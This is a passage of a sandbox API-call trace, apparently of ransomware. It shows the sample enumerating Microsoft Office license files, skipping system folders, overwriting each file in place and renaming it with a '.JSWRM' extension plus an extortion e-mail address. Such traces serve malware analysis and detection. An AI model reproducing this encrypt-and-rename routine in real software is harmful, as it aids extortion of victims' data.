dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.905] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20847) returned 1 [0107.905] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5160) returned 0x24c1d0 [0107.905] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5160, lpOverlapped=0x0) returned 1 [0107.908] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.908] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5160, lpOverlapped=0x0) returned 1 [0107.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.908] CloseHandle (hObject=0x45c) returned 1 [0107.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0107.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0107.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0107.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0107.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.908] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0107.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0107.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0107.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0107.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0107.909] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe91d1cf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe91d1cf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe92dcd83, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_Grace-ul-oob.xrm-ms", cAlternateFileName="PR0B64~1.XRM")) returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.921] lstrcmpiW (lpString1="ProjectProR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0107.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0107.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0107.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0107.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2412e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0107.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0107.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0107.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.923] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11611) returned 1 [0107.923] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.923] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.926] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.926] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.926] CloseHandle (hObject=0x45c) returned 1 [0107.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0107.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0107.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0107.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.927] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0107.927] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0107.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0107.928] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe934f47c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe934f47c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe945a501, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_OEM_Perp-pl.xrm-ms", cAlternateFileName="PR5898~1.XRM")) returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.928] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned 1 [0107.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0107.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0107.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0107.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f48, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0107.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.928] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.929] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0107.929] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.929] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0107.929] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0107.931] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.931] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0107.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.931] CloseHandle (hObject=0x45c) returned 1 [0107.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0107.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0107.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0107.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.932] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0107.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0107.932] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.932] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpror_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0107.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0107.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0107.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0107.933] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe926a670, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe926a670, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe93e7dee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5174, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="PR0FDC~1.XRM")) returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.933] lstrcmpiW (lpString1="ProjectProR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0107.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0107.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0107.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0107.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProR_OEM_Perp-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241290, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0107.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0107.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0107.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.934] WideCharToMultiByte (in: CodePage=0xfde9, 